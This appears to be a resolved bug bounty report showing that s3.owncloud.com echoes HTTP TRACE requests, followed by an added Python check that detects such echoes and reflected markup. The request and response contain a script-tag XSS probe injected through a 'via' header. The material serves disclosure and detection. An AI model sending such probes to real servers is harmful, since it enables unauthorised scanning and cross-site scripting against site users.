[s3.owncloud.com] Web Server HTTP Trace/Track Method Support
Unknown
Vulnerability Details
Hello.
Not an interesting bug, but you can fix it as in #83837. (https://hackerone.com/reports/83837)
Request:
TRACE /gxDM8DATHA HTTP/1.1
Host: s3.owncloud.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
via: <script>alert('QualysXSS');</script>
Response:
TRACE /gxDM8DATHA HTTP/1.1
Host: s3.owncloud.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
via: <script>alert('QualysXSS');</script>
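A defender-side check for the behaviour shown in the request/response pair above, added here as an example and not part of the original report: it takes a captured TRACE request and the response body and reports whether the server echoed the request, which headers came back verbatim, and which of those carried unencoded markup. The function names and the exact `Name: value` line matching are assumptions of this example.

```python
TRACE_METHODS = {"TRACE", "TRACK"}

def parse_request(raw):
    """Split a raw HTTP request head into (method, request_line, headers)."""
    lines = [l.rstrip("\r") for l in raw.strip().split("\n")]
    request_line = lines[0].strip()
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return request_line.split(" ")[0].upper(), request_line, headers

def trace_echo_findings(raw_request, response_body):
    """Compare a captured TRACE/TRACK request with the response body."""
    method, request_line, headers = parse_request(raw_request)
    result = {"trace_method": method in TRACE_METHODS,
              "request_line_echoed": False,
              "reflected_headers": [],
              "unencoded_markup_headers": []}
    if not result["trace_method"]:
        return result
    body_lines = {l.strip() for l in response_body.splitlines()}
    result["request_line_echoed"] = request_line in body_lines
    for name, value in headers:
        # Assumption: the server echoes each header as "Name: value" unchanged.
        if f"{name}: {value}" in body_lines:
            result["reflected_headers"].append(name)
            if "<" in value or ">" in value:
                result["unencoded_markup_headers"].append(name)
    return result

def is_trace_enabled(raw_request, response_body):
    """True when the body reproduces the TRACE/TRACK request line."""
    r = trace_echo_findings(raw_request, response_body)
    return r["trace_method"] and r["request_line_echoed"]

# Request from the report above, with a subset of its headers.
SAMPLE_REQUEST = (
    "TRACE /gxDM8DATHA HTTP/1.1\r\n"
    "Host: s3.owncloud.com\r\n"
    "Accept: */*\r\n"
    "via: <script>alert('QualysXSS');</script>\r\n"
)
SAMPLE_ECHO = SAMPLE_REQUEST  # the reported response repeats the request
# Constructed sample: body a server might return once TRACE is refused.
SAMPLE_BLOCKED = "<html><body>405 Method Not Allowed</body></html>"
```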
Report Stats
- Report ID: 90601
- State: Closed
- Substate: resolved
- Upvotes: 2